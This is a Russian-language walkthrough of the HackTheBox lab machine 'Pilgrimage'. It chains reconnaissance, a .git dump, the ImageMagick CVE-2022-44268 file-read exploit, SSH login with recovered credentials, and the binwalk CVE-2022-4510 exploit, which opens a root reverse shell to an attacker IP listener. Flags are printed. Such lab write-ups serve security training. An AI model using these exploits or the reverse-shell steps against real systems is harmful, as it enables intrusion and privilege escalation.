Обзор сервисов
Машина имеет IP-адрес 10.10.11.219. Посмотрим на nmap:
$ nmap -sV -sC -Pn -p1-65535 -vv -oN 10.10.11.219 10.10.11.219
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-29 14:44 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:44
Completed NSE at 14:44, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 14:44
Completed Parallel DNS resolution of 1 host. at 14:44, 0.00s elapsed
Initiating Connect Scan at 14:44
Scanning 10.10.11.219 [65535 ports]
Discovered open port 80/tcp on 10.10.11.219
Discovered open port 22/tcp on 10.10.11.219
Connect Scan Timing: About 21.05% done; ETC: 14:47 (0:01:56 remaining)
Connect Scan Timing: About 39.19% done; ETC: 14:47 (0:01:35 remaining)
Connect Scan Timing: About 57.08% done; ETC: 14:47 (0:01:08 remaining)
Completed Connect Scan at 14:47, 139.91s elapsed (65535 total ports)
Initiating Service scan at 14:47
Scanning 2 services on 10.10.11.219
Completed Service scan at 14:47, 6.13s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.11.219.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 1.95s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.24s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Nmap scan report for 10.10.11.219
Host is up, received user-set (0.053s latency).
Scanned at 2023-06-29 14:44:54 EDT for 148s
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 20:be:60:d2:95:f6:28:c1:b7:e9:e8:17:06:f1:68:f3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDnPDlM1cNfnBOJE71gEOCGeNORg5gzOK/TpVSXgMLa6Ub/7KPb1hVggIf4My+cbJVk74fKabFVscFgDHtwPkohPaDU8XHdoO03vU8H04T7eqUGj/I2iqyIHXQoSC4o8Jf5ljiQi7CxWWG2t0n09CPMkwdqfEJma7BGmDtCQcmbm36QKmUv6Kho7/LgsPJGBP1kAOgUHFfYN1TEAV6TJ09OaCanDlV/fYiG+JT1BJwX5kqpnEAK012876UFfvkJeqPYXvM0+M9mB7XGzspcXX0HMbvHKXz2HXdCdGSH59Uzvjl0dM+itIDReptkGUn43QTCpf2xJlL4EeZKZCcs/gu8jkuxXpo9lFVkqgswF/zAcxfksjytMiJcILg4Ca1VVMBs66ZHi5KOz8QedYM2lcLXJGKi+7zl3i8+adGTUzYYEvMQVwjXG0mPkHHSldstWMGwjXqQsPoQTclEI7XpdlRdjS6S/WXHixTmvXGTBhNXtrETn/fBw4uhJx4dLxNSJeM=
| 256 0e:b6:a6:a8:c9:9b:41:73:74:6e:70:18:0d:5f:e0:af (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOaVAN4bg6zLU3rUMXOwsuYZ8yxLlkVTviJbdFijyp9fSTE6Dwm4e9pNI8MAWfPq0T0Za0pK0vX02ZjRcTgv3yg=
| 256 d1:4e:29:3c:70:86:69:b4:d7:2c:c8:0b:48:6e:98:04 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILGkCiJaVyn29/d2LSyMWelMlcrxKVZsCCgzm6JjcH1W
80/tcp open http syn-ack nginx 1.18.0
|_http-title: Did not follow redirect to http://pilgrimage.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.55 seconds
Добавим в /etc/hosts домен:
10.10.11.219 piligrimage.htb
Вебка
Сервис для сжимания картинок с регистрацией.
После загрузки обычной картинки в личном кабинете выглядит так:
Посмотрим, что найдет gobuster:
$ gobuster dir -w /usr/share/wordlists/dirb/common.txt -u http://pilgrimage.htb -r -t 20
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://pilgrimage.htb
[+] Method: GET
[+] Threads: 20
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Follow Redirect: true
[+] Timeout: 10s
===============================================================
2023/06/29 14:59:55 Starting gobuster in directory enumeration mode
===============================================================
/.git/HEAD (Status: 200) [Size: 23]
/.hta (Status: 403) [Size: 153]
/.htpasswd (Status: 403) [Size: 153]
/.htaccess (Status: 403) [Size: 153]
/assets (Status: 403) [Size: 153]
/index.php (Status: 200) [Size: 7621]
/tmp (Status: 403) [Size: 153]
/vendor (Status: 403) [Size: 153]
Progress: 4539 / 4615 (98.35%)
===============================================================
2023/06/29 15:00:12 Finished
Публично-доступная директория с файлами Git.
Git
Воспользуемся git-dumper для скачивания файлов:
$ git-dumper http://pilgrimage.htb pilgrimage-git
...
$ ls -la
total 26972
drwxr-xr-x 5 kali kali 4096 Jun 29 15:02 .
drwxr-xr-x 3 kali kali 4096 Jun 29 14:57 ..
drwxr-xr-x 6 kali kali 4096 Jun 29 14:59 assets
-rwxr-xr-x 1 kali kali 5538 Jun 29 14:59 dashboard.php
drwxr-xr-x 7 kali kali 4096 Jun 29 15:01 .git
-rwxr-xr-x 1 kali kali 9250 Jun 29 14:59 index.php
-rwxr-xr-x 1 kali kali 6822 Jun 29 14:59 login.php
-rwxr-xr-x 1 kali kali 98 Jun 29 14:59 logout.php
-rwxr-xr-x 1 kali kali 27555008 Jun 29 14:59 magick
-rwxr-xr-x 1 kali kali 6836 Jun 29 14:59 register.php
drwxr-xr-x 4 kali kali 4096 Jun 29 14:59 vendor
Проверим бинарник и версию magick:
$ file magick
magick: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=9fdbc145689e0fb79cb7291203431012ae8e1911, stripped
$ ./magick --version
Version: ImageMagick 7.1.0-49 beta Q16-HDRI x86_64 c243c9281:20220911 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype jbig jng jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (7.5)
Посмотрим внутрь PHP-файлов и обнаружим путь базы данных.
$ cat login.php | grep sqlite
$db = new PDO('sqlite:/var/db/pilgrimage');
ImageMagick
Для этой версии ImageMagick есть публично-доступный эксплоит:
$ searchsploit imagemagick 7.1.0-49
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
ImageMagick 7.1.0-49 - Arbitrary File Read | multiple/local/51261.txt
ImageMagick 7.1.0-49 - DoS | php/dos/51256.txt
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -m multiple/local/51261.txt
Exploit: ImageMagick 7.1.0-49 - Arbitrary File Read
URL: <https://www.exploit-db.com/exploits/51261>
Path: /usr/share/exploitdb/exploits/multiple/local/51261.txt
Codes: CVE-2022-44268
Verified: False
File Type: ASCII text
Copied to: /home/kali/Desktop/htb/piligrimage/51261.txt
Внутри файла 51261.txt ссылка на https://github.com/voidz0r/CVE-2022-44268. Приготовим эксплоит:
$ git clone <https://github.com/voidz0r/CVE-2022-44268>
$ cd CVE-2022-44268
$ cargo run "/var/db/pilgrimage"
Updating crates.io index
Downloaded bitflags v1.3.2
Downloaded png v0.17.7
Downloaded flate2 v1.0.25
Downloaded adler v1.0.2
Downloaded miniz_oxide v0.6.2
Downloaded hex v0.4.3
Downloaded crc32fast v1.3.2
Downloaded cfg-if v1.0.0
Downloaded 8 crates (301.4 KB) in 0.59s
Compiling crc32fast v1.3.2
Compiling cfg-if v1.0.0
Compiling adler v1.0.2
Compiling bitflags v1.3.2
Compiling hex v0.4.3
Compiling miniz_oxide v0.6.2
Compiling flate2 v1.0.25
Compiling png v0.17.7
Compiling cve-2022-44268 v0.1.0 (/home/kali/Desktop/htb/piligrimage/CVE-2022-44268)
Finished dev [unoptimized + debuginfo] target(s) in 1m 48s
Running `target/debug/cve-2022-44268 /var/db/pilgrimage
Полученный файл image.png загружаем на вебку сервиса:
Скачиваем полученный файл http://pilgrimage.htb/shrunk/649dd78a28d01-min.png и смотрим внутрь:
identify -verbose 649dd78a28d01-min.png
Копируем в текстовый файл HEX-представление файла, после конвертируем с помощью питона:
$ python3
Python 3.11.2 (main, Mar 13 2023, 12:18:29) [GCC 12.2.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> with open("image.txt", "r") as f:
... data = f.read()
...
>>> data1 = data.replace("\n", "")
>>> data2 = bytes.fromhex(data1)
>>> with open("db.sqlite", "wb") as f:
... f.write(data2)
...
20480
>>> exit()
$ file db.sqlite
db.sqlite: SQLite 3.x database, last written using SQLite version 3034001, file counter 63, database pages 5, cookie 0x4, schema 4, UTF-8, version-valid-for 63
Далее можно просто открыть базу с помощью просмотрщика:
Креды пользователя emily:abigchonkyboi123.
SSH
Подключимся с этими кредами по SSH.
$ ssh <[email protected]>
abigchonkyboi123
Пользовательский флаг
emily@pilgrimage:~$ id
uid=1000(emily) gid=1000(emily) groups=1000(emily)
emily@pilgrimage:~$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:2d:07 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
emily@pilgrimage:~$ cat user.txt
cb8917b46b0c38f7de6c121e84663d62
Повышение привилегий
При запуске ps aux виден процесс /bin/bash /usr/sbin/malwarescan.sh, запущенный от имени суперпользователя:
emily@pilgrimage:~$ ps aux | grep malware
root 626 0.0 0.0 6816 2988 ? Ss 05:10 0:00 /bin/bash /usr/sbin/malwarescan.sh
root 651 0.0 0.0 6816 2396 ? S 05:10 0:00 /bin/bash /usr/sbin/malwarescan.sh
emily 1861 0.0 0.0 6240 708 pts/2 S+ 05:24 0:00 grep malware
Посмотрим внутрь этого файла:
$ cat /usr/sbin/malwarescan.sh
# !/bin/bash
blacklist=("Executable script" "Microsoft executable")
/usr/bin/inotifywait -m -e create /var/www/pilgrimage.htb/shrunk/ | while read FILE; do
filename="/var/www/pilgrimage.htb/shrunk/$(/usr/bin/echo "$FILE" | /usr/bin/tail -n 1 | /usr/bin/sed -n -e 's/^.*CREATE //p')"
binout="$(/usr/local/bin/binwalk -e "$filename")"
for banned in "${blacklist[@]}"; do
if [[ "$binout" == *"$banned"* ]]; then
/usr/bin/rm "$filename"
break
fi
done
done
С помощью inotifywait каждый файл в директории /var/www/pilgrimage.htb/shrunk сканируется с помощью binwalk. Проверим версию binwalk:
emily@pilgrimage:~$ binwalk
Binwalk v2.3.2
Craig Heffner, ReFirmLabs
<https://github.com/ReFirmLabs/binwalk>
Usage: binwalk [OPTIONS] [FILE1] [FILE2] [FILE3] ...
...
Поищем эксплоит:
$ searchsploit binwalk
-------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------------------------------------------- ---------------------------------
Binwalk v2.3.2 - Remote Command Execution (RCE) | python/remote/51249.py
-------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
$ searchsploit -m python/remote/51249.py
Exploit: Binwalk v2.3.2 - Remote Command Execution (RCE)
URL: <https://www.exploit-db.com/exploits/51249>
Path: /usr/share/exploitdb/exploits/python/remote/51249.py
Codes: CVE-2022-4510
Verified: False
File Type: ASCII text, with very long lines (614)
Copied to: /home/kali/Desktop/htb/piligrimage/51249.py
Воспользуемся им, чтобы сгенерировать картинку с полезной нагрузкой, и сразу же откроем слушателя:
$ python3 51249.py image.png 10.10.14.194 443
################################################
------------------CVE-2022-4510----------------
################################################
--------Binwalk Remote Command Execution--------
------Binwalk 2.1.2b through 2.3.2 included-----
------------------------------------------------
################################################
----------Exploit by: Etienne Lacoche-----------
---------Contact Twitter: @electr0sm0g----------
------------------Discovered by:----------------
---------Q. Kaiser, ONEKEY Research Lab---------
---------Exploit tested on debian 11------------
################################################
You can now rename and share binwalk_exploit and start your local netcat listener.
$ rlwrap nc -lnvp 443
Сконвертируем картинку в base64, затем на сервере в нужной директории переконвертируем обратно:
# локально, затем скопировать BASE64
$ cat binwalk_exploit-min.png | base64 -w 0
# вставить вместо BASE64 на сервере
emily@pilgrimage:/var/www/pilgrimage.htb/shrunk$ echo BASE64| base64 -d > binwalk_exploit-min.png
И сразу же ловим подключение:
Флаг суперпользователя
$ cd /root
$ id
uid=0(root) gid=0(root) groups=0(root)
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:2d:07 brd ff:ff:ff:ff:ff:ff
altname enp3s0
altname ens160
inet 10.10.11.219/23 brd 10.10.11.255 scope global eth0
valid_lft forever preferred_lft forever
$ cat root.txt
546c2adcd569529c77300134a676ff53
